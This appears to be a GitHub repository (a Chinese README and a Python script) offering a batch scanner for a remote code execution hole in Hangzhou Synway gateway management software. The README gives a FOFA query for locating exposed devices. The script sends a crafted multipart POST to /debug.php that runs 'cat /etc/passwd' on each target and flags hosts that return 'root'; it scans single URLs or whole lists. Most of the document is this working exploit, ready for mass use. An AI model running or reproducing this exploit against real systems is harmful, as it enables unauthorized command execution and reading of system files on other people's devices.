├── README.md
└── debug.py


/README.md:
--------------------------------------------------------------------------------
 1 | # debug
 2 | 杭州三汇网关远程代码执行批量检测脚本
 3 | 
 4 | ![image](https://github.com/user-attachments/assets/60639ee1-24b6-40cb-ad79-6c3a1e9f0a71)
 5 | 
 6 | ```shell
 7 | 检测该漏洞所需要的FOFA语句：
 8 | app="Synway-网关管理软件"
 9 | 
10 | 使用说明：
11 | -u 输入指定的URL单个检测
12 | -f 批量检测文本文件中的URL
13 | 注意：
14 | 使用的python解析器为python3
15 | 输入URL需要http/https协议
16 | ```
17 | 


--------------------------------------------------------------------------------
/debug.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import argparse
 3 | 
 4 | 
 5 | def debug(url):
 6 |     create_url = url + "/debug.php"  # 构造请求的URL地址
 7 | 
 8 |     data='''------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
 9 | Content-Disposition: form-data; name="comdtype"
10 | 
11 | 1
12 | ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
13 | Content-Disposition: form-data; name="cmd"
14 | 
15 | cat /etc/passwd
16 | ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb
17 | Content-Disposition: form-data; name="run"
18 | 
19 | ------WebKitFormBoundaryAEiWTHP0DxJ7Uwmb--'''
20 |     # 构造请求包中提交的数据，其中有命令执行的代码
21 |     headers = {
22 |         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
23 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryAEiWTHP0DxJ7Uwmb"
24 |     }
25 |     # 构造请求数据与请求头中的部分内容
26 | 
27 |     try:
28 |         req = requests.post(create_url, data=data, headers=headers, timeout=5)
29 |         if (req.status_code == 200):
30 |             # 上述构造的请求包中有/etc/passwd命令，看是否有root用户
31 |             if "root" in req.text:
32 |                 print(f"{url}存在关于杭州三汇网关debug远程代码执行漏洞")
33 |                 #print(req.text) #显示该请求发送后响应包返回的内容
34 |             else:
35 |                 print("该网址不存在相关漏洞")
36 |     except:
37 |         print("该网址无法访问或连接错误")
38 | 
39 | 
40 | def debug_counts(filename):
41 |     try:
42 |         with open(filename, "r") as file:
43 |             readline = file.readlines()
44 |             for urls in readline:
45 |                 urls = urls.strip()
46 |                 debug(urls)
47 |     except:
48 |         print("文件不存在或文件打开发生错误")
49 | 
50 | 
51 | def start():
52 |     logo = ''' 
53 |     ░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░░▒▓██████▓▒░  
54 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
55 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░        
56 | ░▒▓█▓▒░░▒▓█▓▒░▒▓██████▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ 
57 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
58 | ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░      ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
59 | ░▒▓███████▓▒░░▒▓████████▓▒░▒▓███████▓▒░ ░▒▓██████▓▒░ ░▒▓██████▓▒░  
60 |                                                                    
61 |                                                                    
62 | '''
63 |     print(logo)
64 |     print("wirten by YZX100")
65 | 
66 | def main():
67 |     parser = argparse.ArgumentParser(description="杭州三汇网关debug远程代码执行")
68 |     parser.add_argument('-u', type=str, help='检测单个url')
69 |     parser.add_argument('-f', type=str, help='批量检测url列表文件')
70 |     args = parser.parse_args()
71 |     if args.u:
72 |         debug(args.u)
73 |     elif args.f:
74 |         debug_counts(args.f)
75 |     else:
76 |         parser.print_help()
77 | 
78 | 
79 | if __name__ == "__main__":
80 |     start()
81 |     main()
82 | 


--------------------------------------------------------------------------------